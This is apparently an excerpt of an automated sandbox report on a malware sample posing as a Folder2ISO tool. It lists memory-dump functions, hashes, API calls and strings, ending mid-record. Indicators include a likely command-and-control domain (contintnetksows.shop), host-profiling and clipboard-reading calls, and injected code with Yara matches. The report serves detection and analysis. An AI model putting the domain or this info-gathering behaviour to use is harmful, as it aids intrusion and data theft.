                  • Instruction ID: b0c3f1e9c1b8cfc202b7804a2801311c3622e03fc3b5b8b8e8bc857eadb417cf
                  • Opcode Fuzzy Hash: dc6057c2dec0c11ec337063b5fc8865ba89929e6884a2c2891ac3a1fa0c3f529
                  • Instruction Fuzzy Hash: CF4188746083118BD728CF18C86076BB7E2FF8A344F488A1DE8E55B381E7B9D545CB96
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0ab283f54214ab17cb4dddf9ec3d889b2a1667a10d8909e90096d83a496d2809
                  • Instruction ID: 6719d57ad6e9e094a6c01757b7e4ca8ff0551d9b5bf2924f174885d39211e79e
                  • Opcode Fuzzy Hash: 0ab283f54214ab17cb4dddf9ec3d889b2a1667a10d8909e90096d83a496d2809
                  • Instruction Fuzzy Hash: BC119D34A08701ABC70DCF04D5A063FB7E2EBD9608F588A1CE48A53242C731ED458B86
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5c2587fb7823da486c94a2042c32ebd6115bb7a471c39eb45b59d4afaa6cc8b2
                  • Instruction ID: b38727743fc38fa7aa0d9e2449e64d1ad33f56af52e536ca9b7bd54f35a198a9
                  • Opcode Fuzzy Hash: 5c2587fb7823da486c94a2042c32ebd6115bb7a471c39eb45b59d4afaa6cc8b2
                  • Instruction Fuzzy Hash: F3F03A78505347DBCB00CF14C4405BABBB1FF59284F04185DF98097260E736C965C792
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b749e5c44071283b4941b32d201a2b9210d51e5f12d375468503ab6258c4da0e
                  • Instruction ID: 741f73927c2667a24f51f03fc811537533c691c5e9a3530509863acefdcff470
                  • Opcode Fuzzy Hash: b749e5c44071283b4941b32d201a2b9210d51e5f12d375468503ab6258c4da0e
                  • Instruction Fuzzy Hash: F2E04F79654700E78A05FF10955163EF371AB8F209B442D99E4A7AB241CB219402CB8A

                  Control-flow Graph: edge list omitted; API calls named in the graph: LoadLibraryExW, GetProcessVersion
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: LibraryLoadProcessVersion
                  • String ID: !$#$#$%$'$)$+$-$/$1$3$5$7$9$:$;$=$?$A$B$C$E$G$W$b$contintnetksows.shop$e$f$l$m$o$p$r$r$v$w$w${$|$}
                  • API String ID: 1829952579-3073657497
                  • Opcode ID: 61e68df6e8efa75c0d7985c8ed1acabef61a53ddb5229d0e283a2503c64af074
                  • Instruction ID: 6543338087bf834b742fb159da4d4e9de70c53ea59e9949948779f2d8bf94ba6
                  • Opcode Fuzzy Hash: 61e68df6e8efa75c0d7985c8ed1acabef61a53ddb5229d0e283a2503c64af074
                  • Instruction Fuzzy Hash: FC926970508B80CFD725DF3CD584716BFE1AF1A214F088A9DD8DA8B396D375A449CBA2

                  Control-flow Graph: edge list not present in this export
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Object$DeleteSelect$CallbackDispatcherUser
                  • String ID:
                  • API String ID: 4290106128-3916222277
                  • Opcode ID: 61daa01bc131d878cd6518c074befb0d2068951986c64e8a52d74a751907393c
                  • Instruction ID: e029d2201f903a0656d6e7960d061503cf0d942241c3d4d0ef2a7305c7f31625
                  • Opcode Fuzzy Hash: 61daa01bc131d878cd6518c074befb0d2068951986c64e8a52d74a751907393c
                  • Instruction Fuzzy Hash: DBC15DB04293859FD370EF25D68878EBBE0ABD6308F60891DE49C5B350D7749498CF86

                  Control-flow Graph: edge list omitted; API calls named in the graph: FreeLibrary, GetComputerNameExA
                  APIs
                  • FreeLibrary.KERNEL32(?), ref: 031F69A4
                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 031F69E0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ComputerFreeLibraryName
                  • String ID: CFZA$odB;
                  • API String ID: 2904949787-3336259320
                  • Opcode ID: 4df36ee93a2f48c02d1c185a0eae7b4cf4cd552379a39118f38553ce51bea286
                  • Instruction ID: 9791d5caabb915b8c050997d18b7f697ed301f855367f54ecdd09b2ef3f5dda0
                  • Opcode Fuzzy Hash: 4df36ee93a2f48c02d1c185a0eae7b4cf4cd552379a39118f38553ce51bea286
                  • Instruction Fuzzy Hash: 85F13770504B818FD725CB39C4647E6BBE1AF1A305F48885ED4EB9B282DBB9B509CB50
                  APIs
                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 031F69E0
                  • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 031F6AF9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ComputerName
                  • String ID: CFZA$N\ln
                  • API String ID: 3545744682-3828061916
                  • Opcode ID: b7f60d28b221e8f61e17ed02a85bd3ee47a794a402f26050df0bc0cc47271fae
                  • Instruction ID: ea7cfaa9a87f4260c04dd77174a87f8b6784e2bbe484f6847080e3cf07c190e2
                  • Opcode Fuzzy Hash: b7f60d28b221e8f61e17ed02a85bd3ee47a794a402f26050df0bc0cc47271fae
                  • Instruction Fuzzy Hash: 59F15770104B818FD725CF29C4A07E7BBE1AF1A304F48895ED9EB9B282D7B9B505CB50
                  APIs
                    • Part of subcall function 00622ADE: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00622B01
                    • Part of subcall function 00622ADE: lstrcpyW.KERNEL32(C:\Users\user\Desktop\6RVmzn1DzL.ini,?), ref: 00622B60
                    • Part of subcall function 00622ADE: CreateMutexW.KERNEL32(00000000,00000001,Folder2ISO,?,AllowMultipleInstances,00000001), ref: 00622B7F
                    • Part of subcall function 00622ADE: GetLastError.KERNEL32(?,AllowMultipleInstances,00000001), ref: 00622B85
                    • Part of subcall function 00622ADE: EnumWindows.USER32(00622A7A,00000000), ref: 00622B98
                  • GetCommandLineW.KERNEL32(00651428,?,0062F581,00620000,00000000,00000000), ref: 00622BCC
                  • CommandLineToArgvW.SHELL32(00000000,?,0062F581,00620000,00000000,00000000), ref: 00622BD3
                  • DialogBoxParamW.USER32(?,00000001,00000000,006227E6,00000000), ref: 00622BEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CommandLine$ArgvCreateDialogEnumErrorFileLastModuleMutexNameParamWindowslstrcpy
                  • String ID:
                  • API String ID: 402598162-0
                  • Opcode ID: ed8c83aadde196833a259f8e50eadd48b3fa1845a0d70164ce6bfdda0322d51f
                  • Instruction ID: 33232975aadd0a720dcfbb3c969c6c9867ed346d2b6e391928e6f5ae7dfa9b17
                  • Opcode Fuzzy Hash: ed8c83aadde196833a259f8e50eadd48b3fa1845a0d70164ce6bfdda0322d51f
                  • Instruction Fuzzy Hash: 9AE086355543227BC7109F707C19B8637D7AB0AB01F516805B900EB190C6B05481CF54
                  APIs
                  • LoadLibraryA.KERNELBASE(00000000,?,?), ref: 02DE19C6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: .dll
                  • API String ID: 1029625771-2738580789
                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                  • Instruction ID: 26f809818e7e65915e69314b500aef425b5deb3a73639e101d473ceba0c8d2aa
                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                  • Instruction Fuzzy Hash: E421D2717042858FEF21EF68CC44BAA7BE8AF11264F18416CD8AB9BB41D730EC45CB90
                  APIs
                  Strings
                  • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 031D926D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
                  • API String ID: 621844428-780655312
                  • Opcode ID: ea51bdb09ece6449c8f816060a1d2cbaeb4d98d54e4bdc0861725eb6080ad395
                  • Instruction ID: 66810fc101ba50b52c0279a0e23aa809efe2f313f6e47f9db117563b8a48304a
                  • Opcode Fuzzy Hash: ea51bdb09ece6449c8f816060a1d2cbaeb4d98d54e4bdc0861725eb6080ad395
                  • Instruction Fuzzy Hash: 90F0C93841C311DBCBD8FBA492443AC77A86F8F244F02861AE9C659949EB7991CDC653
                  APIs
                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 031F8A7C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: InstalledMemoryPhysicallySystem
                  • String ID:
                  • API String ID: 3960555810-0
                  • Opcode ID: 6c7655039255b3cfd7cceb35ffcfa43e43fdb5fc6ebf689ae6119bda5d89f803
                  • Instruction ID: 644269d0a9b88794b249ffc8663e331c888e9ac0e884a8f6484c1cab75ef337d
                  • Opcode Fuzzy Hash: 6c7655039255b3cfd7cceb35ffcfa43e43fdb5fc6ebf689ae6119bda5d89f803
                  • Instruction Fuzzy Hash: 72E19E71504B918FD72ACF39C4507A6FBF1AF4A304F0889AEC5EB9B292D739A445CB10
                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02DE0600
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                  • Instruction ID: 67a2726e57d7114ed82110556cfb48a53394ca2644e47d54b60089f63ba554ce
                  • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                  • Instruction Fuzzy Hash: 6EB1D372500A06ABDF21BE60CC80BA7B7E9FF45316F14062DE59AA6350E771ED50CFA1
                  APIs
                  • LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 03207BB9
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 7ace639a88bf674bb6e4ada1ad277c8d760e052965164d4f77321992557b625f
                  • Instruction ID: d79f46a888964070329c5a42a487e814755117f3856fbf0602401e13cbd9b035
                  • Opcode Fuzzy Hash: 7ace639a88bf674bb6e4ada1ad277c8d760e052965164d4f77321992557b625f
                  • Instruction Fuzzy Hash: E3211D756406429BD718CF18D4A4716B7E2FF95300B68CA5DC5969B789DB30E881CFC4
                  APIs
                  • GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 03203DC9
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: InformationVolume
                  • String ID:
                  • API String ID: 2039140958-0
                  • Opcode ID: 2dcfee4900f914ee841a463c55c9bee1dd4da6fcee2f8816f8081140376e9ab3
                  • Instruction ID: 40574d4b4cdd5491e4edc0d58e2eaaa30a907d199d68f61dbf068d56e19dbf6c
                  • Opcode Fuzzy Hash: 2dcfee4900f914ee841a463c55c9bee1dd4da6fcee2f8816f8081140376e9ab3
                  • Instruction Fuzzy Hash: 7BF0E5352D0741AFE324EF20EC12F567B65AB09B00F24891CFAC39A2C2DBB4B414CB18
                  APIs
                  • GetLogicalDrives.KERNELBASE ref: 03207BE5
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: DrivesLogical
                  • String ID:
                  • API String ID: 999431828-0
                  • Opcode ID: 79d7dce86a44f7bc2f53b79a294f006178b57c1da342bf089d166929e4970dc7
                  • Instruction ID: f396eb6db028b21d54fa05eecc310bd047d601575cabfb8d3800c2545a368bb9
                  • Opcode Fuzzy Hash: 79d7dce86a44f7bc2f53b79a294f006178b57c1da342bf089d166929e4970dc7
                  • Instruction Fuzzy Hash: 49F01C757106008FC369DF28E965926B7E1FB48208314856DE557C7B96DB30A896CF44
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID:
                  • API String ID: 2525500382-0
                  • Opcode ID: a1078fe58ef7700761990d27bde6fd105c563950227992fce7209a5cd2adf37d
                  • Instruction ID: 28d07f51f146e0a5036f021648fc8718102b04a812b3a5b2b53370659a0f0980
                  • Opcode Fuzzy Hash: a1078fe58ef7700761990d27bde6fd105c563950227992fce7209a5cd2adf37d
                  • Instruction Fuzzy Hash: 3EF0F2B8200A02CFC328DF28D094A56B7F2FB8C304F60852CD5AB87B14DB307A05CB04
                  APIs
                  • RtlFreeHeap.NTDLL(?,00000000), ref: 03206028
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: 26756327a4b43a3ea9cd17f87b3b6dd3151fb35b628a384c4983a08e165c8b93
                  • Instruction ID: 46b0a161b2dac3cc1386489962bbd35203ea232ac374179e30db15051e491f2e
                  • Opcode Fuzzy Hash: 26756327a4b43a3ea9cd17f87b3b6dd3151fb35b628a384c4983a08e165c8b93
                  • Instruction Fuzzy Hash: ACC09B36640105FEDE101A44FC05BD8B725E750229F604062E71C95051C233556BD794
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Clipboard$CloseDataLongOpenWindow
                  • String ID: #$&$)$+$,$.$7$8$9$:$;$g
                  • API String ID: 1647500905-2585135712
                  • Opcode ID: ed7b47b73eaeedec3676eb255fb8da4f28fec7f973e93bb2569002b9906e2d9f
                  • Instruction ID: 1836d3c423eba5213492de7122bfecb3ae720a9054cc91a85e6aeadcec0f404c
                  • Opcode Fuzzy Hash: ed7b47b73eaeedec3676eb255fb8da4f28fec7f973e93bb2569002b9906e2d9f
                  • Instruction Fuzzy Hash: 8E715BB4508740CFD764DF28D184716BBF0AF0A314F058A9DE8CA8B766D335E949CBA2
                  APIs
                  • ___crtIsPackagedApp.LIBCMT ref: 0063B394
                  • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000800,?,?,?,?,006341F4,00650B10,Microsoft Visual C++ Runtime Library,00012010), ref: 0063B3B4
                  • GetLastError.KERNEL32(?,?,?,?,006341F4,00650B10,Microsoft Visual C++ Runtime Library,00012010), ref: 0063B3C0
                  • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000000,?,?,?,?,006341F4,00650B10,Microsoft Visual C++ Runtime Library,00012010), ref: 0063B3D6
                  • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 0063B3EC
                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0063B408
                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0063B41C
                  • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 0063B430
                  • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0063B448
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,006341F4,00650B10,Microsoft Visual C++ Runtime Library,00012010), ref: 0063B45A
                  • OutputDebugStringW.KERNEL32(?,?,?,?,?,006341F4,00650B10,Microsoft Visual C++ Runtime Library,00012010), ref: 0063B469
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad$DebugDebuggerErrorLastOutputPackagedPresentString___crt
                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                  • API String ID: 2635489986-564504941
                  • Opcode ID: 3b72f988ad7044d9bf5a57a98bbb714cac33ec4dacaf187c2a27776d37246fe5
                  • Instruction ID: e6e4802dff087c4060bbc59629a32a07d0e9d8dd7eef008d38c6a33d369e5ebb
                  • Opcode Fuzzy Hash: 3b72f988ad7044d9bf5a57a98bbb714cac33ec4dacaf187c2a27776d37246fe5
                  • Instruction Fuzzy Hash: 8951B135900312ABC720DFB5DC58A6BBBEBBF89B51F142919F605D7265EB30C900CBA5
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60add5b6244e98cb20a73502fd4ac33a182b568a2d130c28b969b496c671803c
                  • Instruction ID: 23c406b8e6a387a64e2ad2968857f8e7a4798ee04453dc6266913b8756197c99
                  • Opcode Fuzzy Hash: 60add5b6244e98cb20a73502fd4ac33a182b568a2d130c28b969b496c671803c
                  • Instruction Fuzzy Hash: 8C2288716083419FD724CFA8C885AABB7E6BF89314F584A2DF5CA83291D730D941DB93
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399638918.00000000031D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_31d1000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID:
                  • String ID: %7=$#)).$)#<|$*:9;$1)7.$3 / $B*<0$BJ\H$J`|s$K$&?$QQ[Q$T^XP$dQ
                  • API String ID: 0-3315144211
                  • Opcode ID: cd3edd723ed13f490085df5b47277463bacd731f6294b8077351adb7c771245f
                  • Instruction ID: f11d70ea2f54969e2b088f19906d13b138d3da7fd0097f9e1f2ff0fe54e8fb26
                  • Opcode Fuzzy Hash: cd3edd723ed13f490085df5b47277463bacd731f6294b8077351adb7c771245f
                  • Instruction Fuzzy Hash: D7B166B16083918FD315CF29C4A0B5BFFE0AF96644F18895DE4D98B362C335D94ACB92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2d90000_6RVmzn1DzL.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: %7=$#)).$)#<|$*:9;$1)7.$3 / $B*<0$BJ\H$J`|s$K$&?$QQ[Q$T^XP$dQ
                  • API String ID: 0-3315144211
                  • Opcode ID: cd3edd723ed13f490085df5b47277463bacd731f6294b8077351adb7c771245f
                  • Instruction ID: 501ab873c161ff375f8925307fa04a7248c182d1449c297535bf265160e41852
                  • Opcode Fuzzy Hash: cd3edd723ed13f490085df5b47277463bacd731f6294b8077351adb7c771245f
                  • Instruction Fuzzy Hash: 32B165B150C3818FD725CF29D49076AFBE0AF96648F18895DF4D98B362C335C84ADB92
                  APIs
                  • ShowWindow.USER32(?,00000005,?,?,?,?,?,?,00622ACA), ref: 006229F8
                  • IsIconic.USER32(?), ref: 006229FB
                  • ShowWindow.USER32(?,00000009,?,?,?,?,?,?,00622ACA), ref: 00622A08
                  • SetForegroundWindow.USER32(?), ref: 00622A0B
                  • GetCommandLineW.KERNEL32(?,?,?,?,?,?,00622ACA), ref: 00622A11
                  • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,00622ACA), ref: 00622A1A
                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,00622ACA), ref: 00622A2A
                  • GetCurrentDirectoryW.KERNEL32(00000104,00000000,?,?,?,?,?,?,?,00622ACA), ref: 00622A3C
                  • lstrcpyW.KERNEL32(00000001,00000000), ref: 00622A48
                  • SendMessageW.USER32(?,0000004A,00000000,00000000), ref: 00622A65
                  • LocalFree.KERNEL32(00000000), ref: 00622A6C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Window$LocalShow$AllocCommandCurrentDirectoryForegroundFreeIconicLineMessageSendlstrcpylstrlen
                  • String ID:
                  • API String ID: 169060764-0
                  • Opcode ID: 512650012e0a8a73713a72c1c4cc2d1ee88e44aa22d5162ed02d436464829d00
                  • Instruction ID: 72875fefb5efd5c4be2e5b9360c236ce089081049dea819ed5e5342b39b499b1
                  • Opcode Fuzzy Hash: 512650012e0a8a73713a72c1c4cc2d1ee88e44aa22d5162ed02d436464829d00
                  • Instruction Fuzzy Hash: 1C01D275100316BFD3216B64AC5CFAF7BAEEF86B02F901015F60691160DBB45605CAB6
                  APIs
                  • GetPrivateProfileStringW.KERNEL32(General,OutputDir,0064AF6C,?,00000104,C:\Users\user\Desktop\6RVmzn1DzL.ini), ref: 00621DCE
                  • SHGetFolderPathW.SHELL32(00000000,00008005,00000000,00000000,?), ref: 00621DE1
                  • lstrlenW.KERNEL32(?), ref: 00621DE8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: FolderPathPrivateProfileStringlstrlen
                  • String ID: C:\Users\user\Desktop\6RVmzn1DzL.ini$General$OutputDir
                  • API String ID: 2291318327-2386769019
                  • Opcode ID: c0d2592e45cec8c4ffe8f30e2aad8dab10862ca1a938ee5e923a5c79d8a180ac
                  • Instruction ID: 88ebbde73e3f21aaa7af6461f67aeb8f57dac094b1b8126d409d00b8441d1a5a
                  • Opcode Fuzzy Hash: c0d2592e45cec8c4ffe8f30e2aad8dab10862ca1a938ee5e923a5c79d8a180ac
                  • Instruction Fuzzy Hash: 81F0EC30244720BEE3606B60BC0FEA72ABFDF03B017429018F681DB1A0E7904404CBA1
                  APIs
                  • lstrlenW.KERNEL32(?,?,?,?,?,006229B5), ref: 00622787
                  • CommandLineToArgvW.SHELL32(00000001,?,?,?,?,?,006229B5), ref: 00622796
                    • Part of subcall function 00621364: PathIsRelativeW.SHLWAPI(00000000,?,00000000), ref: 00621427
                    • Part of subcall function 00621364: PathCombineW.SHLWAPI(?,?,00000000), ref: 00621438
                  • GlobalFree.KERNEL32(00000000), ref: 006227AB
                  • IsIconic.USER32(?), ref: 006227B9
                  • ShowWindow.USER32(-00000005,?,006229B5), ref: 006227D0
                  • SetForegroundWindow.USER32 ref: 006227DC
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: PathWindow$ArgvCombineCommandForegroundFreeGlobalIconicLineRelativeShowlstrlen
                  • String ID:
                  • API String ID: 3033830010-0
                  • Opcode ID: 0cc04cdd94d8eece3e025078eba42f50c6b5e09467b30ccc375827a7c9c48c1a
                  • Instruction ID: f4f0c9aec552c5c62f6b0ee73e329c97f842a4fd05e9cb98d1e42c70720fba89
